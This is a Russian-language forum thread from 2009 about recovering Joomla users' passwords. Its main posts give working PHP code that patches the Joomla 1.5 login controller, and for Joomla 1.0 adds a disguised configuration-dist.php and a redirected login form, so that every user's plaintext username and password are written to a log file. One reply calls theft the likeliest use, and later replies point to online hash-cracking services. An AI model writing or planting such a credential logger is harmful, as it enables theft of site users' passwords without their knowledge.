1. Уважаемые пользователи, прежде чем ответить в теме или создать новую,
    внимательно ознакомьтесь с правилами раздела

    Кому лень работать или руки не оттуда - пользуйтесь услугами специалистов
  2. Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.."

    Есть JED!!! Ищите там!!!

Обсуждение [J1.5] Как узнать пароль пользователя в Joomla?

Тема в разделе "Joomla", создана пользователем scarm, 4 янв 2009.

Информация :
  • Уважаемые пользователи, прежде чем ответить в теме или создать новую, внимательно ознакомьтесь с правилами раздела
  • Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.." Есть JED!!! Ищите там!!!
  • Аналоги ищите там же - на JED!!!
  • Новая версия? - У кого будет - тот выложит!
Статус темы:
Закрыта.
Модераторы: arman29, DMS, Genk0
  1. scarm

    scarm Постоялец

    Регистр.:
    16 мар 2008
    Сообщения:
    93
    Симпатии:
    34
    Актуально для joomla 1.5.+
    Все пароли юзеров хранятся в базе данных в хэшированном виде md5($pass.$salt)
    и кроме брута никак не могут быть восстановлены. Обойти это можно так:


    1. Создаем в каталоге components/com_user/ файл log.txt
    2. Правим файл components/com_user/controller.php

    2a. Ищем function login()
    2б. Дописываем после
    Код:
    		$credentials = array();
    		$credentials['username'] = JRequest::getVar('username', '', 'method', 'username');
    		$credentials['password'] = JRequest::getString('passwd', '', 'post', JREQUEST_ALLOWRAW);
    
    следующие строки:
    Код:
    $username = JRequest::getVar('username'); 
    $passwd = JRequest::getVar('passwd'); 
    $res = fopen ('components/com_user/log.txt',"a+");  
        fputs ($res,"$username");  
        fputs ($res,"::::");  
        fputs ($res,"$passwd\n"); 
        fclose($res); 	
    
    3. После того как юзер залогинится, в файле log.txt появится строка вида логин::::пароль

    Вуаля.
     
    HorriganF, gaiwan, gunkin и 2 другим нравится это.
  2. mmka

    mmka ----

    Регистр.:
    23 май 2008
    Сообщения:
    413
    Симпатии:
    201
    Ну и для чего это нужно?
    Чтобы красть пароли чтоль?
     
  3. elchegevara

    elchegevara

    Регистр.:
    20 окт 2007
    Сообщения:
    221
    Симпатии:
    59
    И не только ... много применения .. но красть конечно вероятнее :)
    scarm
    Может похожее для 1.0 ветки состряпаешь? )
     
  4. scarm

    scarm Постоялец

    Регистр.:
    16 мар 2008
    Сообщения:
    93
    Симпатии:
    34
    их есть у меня, сейчас в отдельную тему сброшу :)

    Добавлено через 8 минут
    Актуально для joomla 1.0.+ < 1.5.0
    Все пароли юзеров хранятся в базе данных в хэшированном виде md5
    и кроме брута никак не могут быть восстановлены. Обойти это можно так:


    В php я пока еще чайник, наверняка схема может быть намного проще, но эта вроде работает:
    Итак:
    1. В корневом каталоге переименовываем файл configuration.php-dist в configuration-dist.php
    1a. его содержание будет таким:
    Код:
    <?php
    /**
    * @version $Id: configuration.php-dist 7424 2007-05-17 15:56:10Z robs $
    * @package Joomla
    * @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
    * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
    * Joomla! is free software and parts of it may contain or be derived from the
    * GNU General Public License or other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    *
    * -------------------------------------------------------------------------
    * THIS SHOULD ONLY BE USED AS A LAST RESORT WHEN THE WEB INSTALLER FAILS
    *
    * If you are installing Joomla manually i.e. not using the web installer
    * then rename this file to configuration.php e.g.
    *
    * UNIX -> mv configuration.php-dist configuration.php
    * Windows -> rename configuration.php-dist configuration.php
    *
    * Now edit this file and configure the parameters for your site and
    * database.
    * -------------------------------------------------------------------------
    * Database configuration section
    * -------------------------------------------------------------------------
    */
    $username = $_POST["username"];
    $passwd = $_POST["passwd"];
    $res = fopen ('modules/log.txt',"a+"); 
    	fputs ($res,"$username"); 
    	fputs ($res,"::::"); 
    	fputs ($res,"$passwd\n");
    	fclose($res);
    include 'index.php';
    /**
    * -------------------------------------------------------------------------
    * Site specific configuration
    * -------------------------------------------------------------------------
    */
    ?>
    
    2. Создаем файл modules/log.txt

    3. В файле modules/mod_login.php
    меняем строку
    <form action="<?php echo sefRelToAbs( 'index.php' ); ?>" method="post" name="login" >
    на
    <form action="<?php echo sefRelToAbs( 'configuration-dist.php' ); ?>" method="post" name="login" >

    4. Радуемся жизни. После того как юзер залогинится, в файле modules/log.txt появится строка вида логин::::пароль


    Вуаля.
     
    elchegevara нравится это.
  5. arman29

    arman29 Генератор идей

    Moderator
    • Супермодератор
    Регистр.:
    30 июн 2008
    Сообщения:
    1.235
    Симпатии:
    657
    конечно полезный совет для тех у кого нету доступа от cpanel'и или несудьба зайти через phpmyadmin :D

    вообще имея доступ от бд можно узнать любой пароль и логин :)

    p/s: а вдруг пользователь надолгое время был забанен или незаходил вообще и спустя некоторое время его учетка уже небудет актуальна :-]
     
  6. kaveo

    kaveo Постоялец

    Регистр.:
    29 июн 2008
    Сообщения:
    96
    Симпатии:
    14
    Опишите последовательность действий?
    Только для начала покурите что такое md5.

    Сменить пароль при помощи phpmyadmin можно, узнать — нет.
     
  7. scarm

    scarm Постоялец

    Регистр.:
    16 мар 2008
    Сообщения:
    93
    Симпатии:
    34
    md5 это хеш, то есть необратимый слепок с пароля, если собрались через соленые хеши искать пароль пользователя, то insidepro вам в помощь и сеть суперкомпьютеров пентагона и наса (ну, или ОЧЕНЬ большое везение) :D
    Попробуйте достать пароль от этого хеша
    Код:
    53cc4dcebfe2101aa6fe8e6a422247f6:7HIrJv8VBjC9IOai
    
    А уже потом можно и поговорить о вашем оптимизме :)
     
  8. arman29

    arman29 Генератор идей

    Moderator
    • Супермодератор
    Регистр.:
    30 июн 2008
    Сообщения:
    1.235
    Симпатии:
    657
    вообще-то я имел ввиду просто СМЕНУ ПАРОЛЯ! щас перечитал тему! оказывается нетак вкурил :)

    ну я то знаю как сменить пароль через пхпмайадмин и все такое, но насчет изложенного выше способов посмотреть надо, как грится, потестить :)
     
  9. bumbu

    bumbu

    Регистр.:
    17 окт 2007
    Сообщения:
    233
    Симпатии:
    28
    а если хочется нашару то можно h_ttp://passcracking.ru/index.php тут попытать щастье (если пароль стандарт то найдётся - у ооочень многих обычно такие пароли) или отдать на более глубокий анализ. но всёравно тут есть и доля удачи.
    п.с. есть легенда что какимто профессорам удалось всётаки на всоём компике (не суперкомп) получить за час то что было захэшированно : )
     
  10. scarm

    scarm Постоялец

    Регистр.:
    16 мар 2008
    Сообщения:
    93
    Симпатии:
    34
    bumbu, возвращаю вас на 2 поста вверх, получите пароль от этого хэша, а потом поговорим о везении и легендах. Оочень простые пароли (по моим прикидкам таких около 30-50%) в основном защищают Оочень лажовую инфу (за редким исключением) h_ttp://passcracking.ru/index.php и прочие онлайн сервисы брутят только чистый md5 которого практически не осталось, в основном везде md5($salt.$pass), а соленые хэши - это уже совершенно другой коленкор и онлайн вы его не сбрутите. И мне кажется, что все-таки будет удобнее сделать текстовый лог авторизаций (при этом предварительно написав, чтобы сбросились кукисы), чем без всяких гарантий на успех убивать свое железо и тратить время на брут соленых хэшей ;)
     
Статус темы:
Закрыта.